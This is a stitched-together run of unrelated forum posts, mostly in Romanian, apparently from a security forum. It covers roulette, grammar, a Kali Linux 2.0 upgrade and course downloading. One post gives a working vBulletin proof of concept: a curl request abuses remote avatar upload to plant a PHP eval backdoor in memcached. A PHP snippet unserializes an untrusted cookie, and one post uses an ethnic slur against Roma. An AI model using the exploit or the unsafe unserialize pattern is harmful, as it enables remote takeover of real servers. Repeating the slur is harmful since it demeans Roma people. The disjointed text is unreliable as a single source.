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https://rstforums.com/forum/102902-pack-encrypt-decrypt-tools-dang3r1988.rst + https://rstforums.com/forum/82107-encrypt-decrypt-tools-post529302.rst#post529302
Tutorial castig la ruleta: Nu pariezi la ruleta si te alegi cu bani care nu i-ai pus, si nu imi spune ca ai castigat odata multi bani ca in timp tot tu iesi in pierdere.
Mie imi da crash la toate tab-urile care le am deschise..
Sufixul este o îmbinare de sunete (litere din alfabet) sau un singur sunet care se adaug? dup? r?d?cina sau dup? tema unui cuvânt pentru a crea cuvinte sau forme gramaticale noi. alte referinte: p.s: Nu ar trebui sa razi de alte persoane in cazul in care tu acum jumatate de an erai pe chat si imi spuneai ca se foloseste sti in loc de stii si sustineai ca eu sunt un analfabet.
Asta este un pm ce l-am primit.
@spider incearca asa } global $visit_pages_arr; if(isset($_COOKIE['visit_pages']) && count($_COOKIE['visit_pages']) > 0){ $visitpg = unserialize($_COOKIE['visit_pages']); foreach($visitpg as $k=>$v){ $visit_pages = $v+1; unset($_COOKIE['visit_pages'][$k]); setcookie("visit_pages[$k]", $visit_pages, time()+(60*60*24*365),"/"); $visit_pages_arr[$k] = $visit_pages; } } } p.s nu am testat, scuze daca nu merge...
Imi amintesti de unu de pe hackpedia care si el la fel ca tine punea o imagine la finalul fiecarui post pentru ca nu stia sa-si puna semnatura. on: Bine ai venit boss.
"rasa noastra" ? Tu esti tigan, nene, specifica urmatoarea data ca vorbesti de rasa ta de tigani nu de romani.
Hmmm dupa ce am vazut pozele astea mi-a venit si mie pofta de penetrare :> .
Daca imi spui pentru ce ai nevoie poate ti le dau eu.
Ai incercat pe site-ul lor sa ceri ajutor ? sau pe email? sau tu crezi ca e pus degeaba emailul si sistemul de tichete acolo? support@gamecp.com
Vezi sa nu faci cu inima ca nu am pus sursa.
vBulletin's memcache setting is vulnerable in certain versions(all before 4.2.2) to an RCE. vBulletin seem to have refused to classify it as a vulnerability or post anything about it, or put anything in the announcements on their website. They say "PL2 (4.2.2) should prevent the use of localhost," however that doesn't help people using previous versions(which they appear to support with patches, still.) They also haven't updated previous versions of vBulletin for this bug, despite it being reported that it works on versions prior to 4.2.2. Of course though, the most important thing is, they haven't announced there even is/was a vulnerability in any version. Anyways, here it is: Remote Upload allows to send arbitrary data to loopback-only services, possibly allowing the execution of arbitrary code Exists in vB4 The remote upload as implemented by the vB_Upload_* classes and vB_vURL (at least in vB 4.2.x, most probably earlier releases are also affected, and vB 5 might be affected as well) does not restrict the destination ports and hosts for remote uploads. This allows an attacker to abuse the function to as a proxy commit TCP port scans on other hosts. Much worse, it also allows to connect to local loopback-only services or to services only exposed on an internal network. On a setup running e.g. Memcached in default configuration (bound to localhost:11211, no authentication), the latter can be exploited to execute arbitrary code by forging a request to memcached, updating the `pluginlist` value. Proof-of-Concept using cURL: — $ curl 'http://sandbox.example.com/vb42/profile.php?do=updateprofilepic' -H 'Cookie: bb_userid=2; bb_password=926944640049f505370a38250f22ae57' --data 'do=updateprofilepic&securitytoken=1384776835-db8ce45ef28d8e2fcc1796b012f0c9ca1cf49e38&avatarurl=http://localhost:11211/%0D%0Aset%20pluginlist%200%200%2096%0D%0Aa%3A1%3A%7Bs%3A12%3A%22global_start%22%3Bs%3A62%3A%22if%28isset%28%24_REQUEST%5B%27eval%27%5D%29%29%7Beval%28%24_REQUEST%5B%27eval%27%5D%29%3Bdie%28%29%3B%7D%0D%0A%22%3B%7D%0D%0Aquit%0D%0A.png' — This leads to vBulletin opening a connection to the Memcached (localhost:11211) and sending the following data: — HEAD / set pluginlist 0 0 96 a:1:{s:12:"global_start";s:62:"if(isset($_REQUEST['eval'])){eval($_REQUEST['eval']);die();} ";} quit .png HTTP/1.0 Host: localhost User-Agent: vBulletin via PHP Connection: close — This will cause the Memcached to update the `pluginlist` to contain the malicious code. Furthermore, the remote upload happily follows all kinds of redirects if provided with an appropriate Location header.
Offensive Security, the creators of Swiss army knife for Security researchers, Penetration testers and Hackers have finally released the much awaited and most powerful version of Kali Linux 2.0. Kali Linux 2.0 (Codename ‘Kali Sana’), an open-source penetration testing platform brings hundreds of Penetration Testing, Forensics, Hacking and Reverse Engineering tools together into a Debian-based Linux distribution. Kali Linux 2.0 offers a redesigned user interface for streamlined work experience, along with a new multi-level menus and tool categories options. Kali Linux 2.0 is now a rolling distribution, means users will receive tools and core system updates frequently. Kali Linux 2.0 Features: Runs on Linux kernel 4.0, use full Gnome 3 Desktop instead of gnome-fallback, improved hardware and wireless driver coverage, support for a variety of Desktop Environments, updated desktop environment and tools, Featuring new cutting-edge wireless penetration tools, Kali Linux now added desktop notifications, so that you do not miss anything, Support Ruby 2.0, which will make Metasploit will load much faster, Kali 2.0 added inbuilt screencasting tool so that you can record desktop. Sadly, Kali team has removed the Metasploit Community and Pro packages. Instead, now just offers open-source Metasploit-framework package pre-installed. Upgrade to Kali 2.0 Kali Linux users can upgrade their Kali 1.x to Kali 2.0 without reinstalling whole operating system from scratch. To do this, you will need to edit your source.list entries, and run a dist-upgrade as shown below. cat << EOF > /etc/apt/sources.list deb http://http.kali.org/kali sana main non-free contrib deb http://security.kali.org/kali-security/ sana/updates main contrib non-free EOF apt-get update apt-get dist-upgrade # get a coffee, or 10. reboot Download kali
https://github.com/gaganpreet/udemy-dl Dupa ce instalati udemy-dl, intrati pe cursul care doriti, copiati link-ul si da-ti pe start preview, dupa schimbati link-ul de jos cu cursul care il vreti. Aveti mai multe detalii in engleza aici, daca nu va descurcati puteti sa lasati si reply in acest thread. udemy-dl -u email@ceva.com -p parola https://www.udemy.com/COURSE_NAME
Am postat eu, mi-a sters postul. p.s: Va rog sa nu mai postati atat de mult in topic daca nu aveti ceva important de spus sau a mai fost spus, nu de alta dar umplem homepage-ul cu un milog.
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